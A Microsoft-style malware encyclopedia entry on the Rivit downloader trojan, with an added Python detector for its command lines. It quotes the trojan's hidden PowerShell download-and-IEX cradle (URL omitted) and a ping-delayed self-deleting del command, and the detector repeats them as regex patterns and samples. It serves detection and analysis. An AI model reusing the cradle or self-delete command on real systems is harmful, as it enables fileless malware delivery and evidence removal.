
TrojanDownloader:Win32/Rivit.A!dha


First posted on 15 April 2017.
Source: Microsoft

Aliases :

There are no other names known for TrojanDownloader:Win32/Rivit.A!dha.

Explanation :

This trojan launches a PowerShell process that downloads a script from a remote host and executes it in memory. The command runs without loading a profile (-nop), with a hidden window (-w hidden), and routes the request through the system proxy using the logged-on user's default credentials, so it works from behind an authenticating corporate proxy. The downloaded text is passed straight to Invoke-Expression (IEX), so no file needs to be written to disk. The URL argument to downloadstring is not shown in the command as captured:

  • powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring();

The trojan then uses a command prompt process to run a command that deletes the malware file. Because cmd.exe has no built-in sleep, the command pings an IP address in the private 192.168.0.0/16 range (192.168.0.1 to 192.168.255.254) as a delay: with -n 1 -w 2000 ping sends a single echo request and waits up to 2000 ms for a reply, so an unanswered ping stalls the command for roughly two seconds, giving the original process time to exit before del runs. The path passed to del is not shown in the command as captured.

We have seen it use the following command and IP address:
  • cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del
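Both command lines above are visible in process-creation telemetry (Windows Security event 4688 or Sysmon event 1, command-line field). The following is an added example, not code from Microsoft or the original page, that flags both patterns in a list of command lines: the hidden-window PowerShell download cradle, and ping used as a sleep chained into del. The sample command lines are constructed for the example; the del path in the second one is hypothetical, since the page truncates that argument.

```python
"""Flag Rivit-style process command lines in process-creation telemetry."""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample command lines (not from the original page). The first two
# mirror the page's Rivit commands; the last two are benign admin usage.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -c $J=new-object net.webclient;"
    "$J.proxy=[Net.WebRequest]::GetSystemWebProxy();"
    "$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
    "IEX $J.downloadstring();",
    # del target is hypothetical; the page does not show it.
    "cmd.exe /c ping -n 1 -w 2000 192.168.123.254 > nul & del C:\\Users\\Public\\update.exe",
    "powershell.exe -NoProfile -Command Get-Process",
    "cmd.exe /c ping -n 4 8.8.8.8",
]

# Rule 1: PowerShell download cradle. Require all four traits in one command
# line: hidden window, System.Net.WebClient, a Download* call, and IEX.
_PS_HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
_PS_WEBCLIENT = re.compile(r"net\.webclient", re.IGNORECASE)
_PS_DOWNLOAD = re.compile(r"\.download(?:string|file|data)\s*\(", re.IGNORECASE)
_PS_IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)

# Rule 2: "ping -n <count> -w <ms> <ip> ... & del": ping used as a sleep
# immediately before a file deletion.
_PING_DEL = re.compile(
    r"\bping(?:\.exe)?\s+-n\s+(?P<count>\d+)\s+-w\s+(?P<wait>\d+)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}).*?&+\s*del\b",
    re.IGNORECASE,
)


def is_powershell_cradle(cmdline: str) -> bool:
    """True when a PowerShell command line shows the download-and-IEX cradle."""
    if "powershell" not in cmdline.lower():
        return False
    return all(p.search(cmdline) for p in (_PS_HIDDEN, _PS_WEBCLIENT, _PS_DOWNLOAD, _PS_IEX))


def ping_delay_self_delete(cmdline: str) -> Optional[Dict[str, object]]:
    """Return details of a ping-then-del chain, or None if the pattern is absent."""
    m = _PING_DEL.search(cmdline)
    if not m:
        return None
    try:
        ip = ipaddress.ip_address(m.group("ip"))
    except ValueError:
        return None
    # With no reply, each echo request waits the full -w timeout, so the
    # delay is roughly count * wait milliseconds.
    delay_ms = int(m.group("count")) * int(m.group("wait"))
    return {"ip": str(ip), "delay_ms": delay_ms, "private": ip.is_private}


def scan(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """Run both rules over command lines; return (rule_name, cmdline) hits."""
    findings: List[Tuple[str, str]] = []
    for c in cmdlines:
        if is_powershell_cradle(c):
            findings.append(("powershell_download_cradle", c))
        if ping_delay_self_delete(c) is not None:
            findings.append(("ping_delay_self_delete", c))
    return findings


if __name__ == "__main__":
    for rule, cmd in scan(SAMPLE_CMDLINES):
        print(f"[{rule}] {cmd}")
```

The cradle rule deliberately requires all four traits so that routine `-w hidden` scheduled tasks or plain WebClient downloads do not fire on their own; the ping rule reports the pinged address and whether it is private so an analyst can see at a glance that the "host" was never meant to answer.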




Analysis by Mathieu Letourneau

Last update 15 April 2017
